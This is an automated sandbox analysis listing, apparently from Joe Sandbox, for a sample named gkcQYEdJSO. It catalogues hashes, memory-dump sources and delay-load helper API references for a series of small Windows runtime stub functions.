Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3bc432d9ea7240cfeca47696fe921e1f860e3aff62f4611fcb89419811e27df2
Instruction ID: 018988015ad82ad971de7cfda118492fe1d16194aa05fba835571c99a4aab48c
Opcode Fuzzy Hash: 3bc432d9ea7240cfeca47696fe921e1f860e3aff62f4611fcb89419811e27df2
Instruction Fuzzy Hash: B4B012E1369284BC3144B2152D03C37030CC0C0F20330913FF905C8380DC40AD541871

Function 00DDE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE3FC

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 06b3968a0c8266791619bdf9ab449716bf7b73c9254e2d4181ca858bd720e50b
Instruction ID: 8b8452b053932497fbae0ce5aa86079470a57f6bf7330881527f95a21d50738a
Opcode Fuzzy Hash: 06b3968a0c8266791619bdf9ab449716bf7b73c9254e2d4181ca858bd720e50b
Instruction Fuzzy Hash: 90B012E12AC054BC3104B1142D03C37030CC5C1B11330E12FF904D9280D8408C0C1873

Function 00DDE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE3FC

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d8fc048a7e0f3a681d030308127dd8307a4fa9d48fa1c252eb9b99741778d07d
Instruction ID: f69892dcb8b3d0f552d97f2b501fc29f800e08fe7e527b1b55ad52dd2f8d96ee
Opcode Fuzzy Hash: d8fc048a7e0f3a681d030308127dd8307a4fa9d48fa1c252eb9b99741778d07d
Instruction Fuzzy Hash: BDB012E13AC0547C310471142E03C37430CC4C1B11330E12FF604E9280D8404C0D1873

Function 00DDE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE3FC

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e0c3407e13973275beccd07fe809dbf4d9daf2341502771a11168cabe884337f
Instruction ID: e9483096ee3800bde2027be42d968261a842dc885f6696b3418ab9ddee44b7c6
Opcode Fuzzy Hash: e0c3407e13973275beccd07fe809dbf4d9daf2341502771a11168cabe884337f
Instruction Fuzzy Hash: 6BB012F12AC054BC3104B1142D03C37030CC5C1F11330E02FF904D9280DC448E081873

Function 00DDE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE580

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2deade5737721fbbc3e1376736ccae805e711b0416c36b2a946333002ad76e3f
Instruction ID: 1d65cbe2903bb049287a5fd181452f1b12ac359056030e8ff21c3beb4a585866
Opcode Fuzzy Hash: 2deade5737721fbbc3e1376736ccae805e711b0416c36b2a946333002ad76e3f
Instruction Fuzzy Hash: CFB012C126D06C7D310471643D03C37030CC4C0B11331E16FF404C96C0E8404C241871

Function 00DDE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE580

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 15c9d14342d9ef5c6e146246d16fd42c63c24f5630e3925c461258e85c604e94
Instruction ID: b6f56708989add251ccb0dc844787a781b56d22edd4ac6089d6c946de6e286d2
Opcode Fuzzy Hash: 15c9d14342d9ef5c6e146246d16fd42c63c24f5630e3925c461258e85c604e94
Instruction Fuzzy Hash: 01B012C126D1647C314471647D03C37031CC4C0B11331E22FF404C92C0E8404C641871

Function 00DDE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE580

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 61faf4935b6a31f38e8600c9db68ab54e658dd4bf45628b94e23920d979ff09d
Instruction ID: add153958800473f4883193a34a0b3e8d8ca2a00a66a1db00fb35356e2c2c641
Opcode Fuzzy Hash: 61faf4935b6a31f38e8600c9db68ab54e658dd4bf45628b94e23920d979ff09d
Instruction Fuzzy Hash: 64B012C176D0647C310471647E03C37031CC4C0B11331E22FF404C92C0EC404D251871

Function 00DDE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE51F

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5e0d080a2612379e089a6a157f9d0211e9f530125c8ae14e1928a656c2714384
Instruction ID: 80997f49575e3947ef519771cb7c8f0c24752239c05d5102a576005dea3706ca
Opcode Fuzzy Hash: 5e0d080a2612379e089a6a157f9d0211e9f530125c8ae14e1928a656c2714384
Instruction Fuzzy Hash: 93B012C126C1457C320471187D03C3B030CC0C1F10330A22FF404CC280E8404C482875

Function 00DDE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE51F

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e138e4a317e58651bd8fd818482cb3efcd5c1f7b3c96e9768e724ad5c8644f57
Instruction ID: a905e17e81c2b376288fb4149b4dec0ac69cc5872cc584cfc7795310aca66d92
Opcode Fuzzy Hash: e138e4a317e58651bd8fd818482cb3efcd5c1f7b3c96e9768e724ad5c8644f57
Instruction Fuzzy Hash: CEB012C126C0457C310431343D07C3B030DD0C1F10330A03FF450DC581A8404D082871

Function 00DDE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE51F

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7afec2f4ec1590c24511d9942450a2efb29994a4442f4da6293f055247ab543b
Instruction ID: 2ff4fc85660840fe56d28d896df2813df3c2fac2c14bba7c594a301274b5e8ce
Opcode Fuzzy Hash: 7afec2f4ec1590c24511d9942450a2efb29994a4442f4da6293f055247ab543b
Instruction Fuzzy Hash: E7B012C126C0497D310471183D03D3B030CC0C1F10330A12FF404CC680E8804C042871

Function 00DDE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE51F

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 033dc2c047a4160bb85d659c88237ea361e2f2ed1881e7cbffeb2f9df12ea403
Instruction ID: f05d8a6901c96f4893dfc14d9163820be16b00a1666a9e00613781131a0a2bf4
Opcode Fuzzy Hash: 033dc2c047a4160bb85d659c88237ea361e2f2ed1881e7cbffeb2f9df12ea403
Instruction Fuzzy Hash: C6B012C136C0897C310471183E03C3B070CC0C1F10330E02FF504CC680E8804C052871

Function 00DDE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c88fa7f869cc8d65044e7c471b604a98d6eeb8d5782e0c91c84aaf0c29ec3f9a
Instruction ID: 7a4708c20631b13b9f7e081d2ac1557faf13e4e9c868ee55d7a29f1201b95cf6
Opcode Fuzzy Hash: c88fa7f869cc8d65044e7c471b604a98d6eeb8d5782e0c91c84aaf0c29ec3f9a
Instruction Fuzzy Hash: 2BA001E66A928ABC3108B2526E06C3B031DC4C5B65331992FF956C8681A890A85928B1

Function 00DDE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 00a8287a3326726ac532a1a5d2a132f5bbf7ae93131cf34df81430cd0a7a81c1
Instruction ID: 7a4708c20631b13b9f7e081d2ac1557faf13e4e9c868ee55d7a29f1201b95cf6
Opcode Fuzzy Hash: 00a8287a3326726ac532a1a5d2a132f5bbf7ae93131cf34df81430cd0a7a81c1
Instruction Fuzzy Hash: 2BA001E66A928ABC3108B2526E06C3B031DC4C5B65331992FF956C8681A890A85928B1

Function 00DDE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3d9abf028c37a69b3fea44082a28fe64419e18902d256e1ef1131727b93f48b2
Instruction ID: 7a4708c20631b13b9f7e081d2ac1557faf13e4e9c868ee55d7a29f1201b95cf6
Opcode Fuzzy Hash: 3d9abf028c37a69b3fea44082a28fe64419e18902d256e1ef1131727b93f48b2
Instruction Fuzzy Hash: 2BA001E66A928ABC3108B2526E06C3B031DC4C5B65331992FF956C8681A890A85928B1

Function 00DDE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 62eabb5a88a3b8c6e007252af82794821f0af05e824fdf2947e67eba525158a9
Instruction ID: 7a4708c20631b13b9f7e081d2ac1557faf13e4e9c868ee55d7a29f1201b95cf6
Opcode Fuzzy Hash: 62eabb5a88a3b8c6e007252af82794821f0af05e824fdf2947e67eba525158a9
Instruction Fuzzy Hash: 2BA001E66A928ABC3108B2526E06C3B031DC4C5B65331992FF956C8681A890A85928B1

Function 00DDE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 01e679bfd18f13e5e9f79338508b083567e1d7645e1d0db228a1ee7fe92f38f7
Instruction ID: 7a4708c20631b13b9f7e081d2ac1557faf13e4e9c868ee55d7a29f1201b95cf6
Opcode Fuzzy Hash: 01e679bfd18f13e5e9f79338508b083567e1d7645e1d0db228a1ee7fe92f38f7
Instruction Fuzzy Hash: 2BA001E66A928ABC3108B2526E06C3B031DC4C5B65331992FF956C8681A890A85928B1

Function 00DDE2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE1E3

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2c6ae7ae1f20bcc7e409f8289d043cbf94dcd7c61802421b36d8f9e0d7e4c0d2
Instruction ID: 7a4708c20631b13b9f7e081d2ac1557faf13e4e9c868ee55d7a29f1201b95cf6
Opcode Fuzzy Hash: 2c6ae7ae1f20bcc7e409f8289d043cbf94dcd7c61802421b36d8f9e0d7e4c0d2
